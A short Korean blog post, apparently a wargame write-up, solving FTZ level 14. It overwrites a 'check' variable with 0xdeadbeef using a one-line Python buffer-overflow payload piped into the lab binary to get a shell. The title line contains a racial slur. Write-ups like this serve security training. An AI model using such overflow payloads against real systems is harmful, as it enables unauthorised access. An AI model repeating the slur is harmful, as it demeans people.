Dominic Repo

FTZ. 14 본문

System/FTZ

FTZ. 14

DominicS 2019. 9. 6. 13:48
level14 // what that nigga want?



힌트를 보니 check가 0xdeadbeef 가 되면 쉘을 딸수 잇는것 같다!

우선 gdb로 디버깅해보잣



분석해보면 다음과 같다.

그렇다면 우리는 다른것 볼 필요없이 buf,dummy 40바이트에 NOP을 채워주고 check엔 "deadbeef" 를 넣어주기!

(python -c 'print "\x90"*40+"\xef\xbe\xad\xde"';cat)|./attackme



성공~
저작자표시

'System > FTZ' 카테고리의 다른 글

FTZ. 16  (0) 2019.09.06
FTZ. 15  (0) 2019.09.06
FTZ. 13  (0) 2019.09.06
FTZ. 12  (0) 2019.09.06
FTZ. 11  (0) 2019.09.06
'System/FTZ' Related Articles more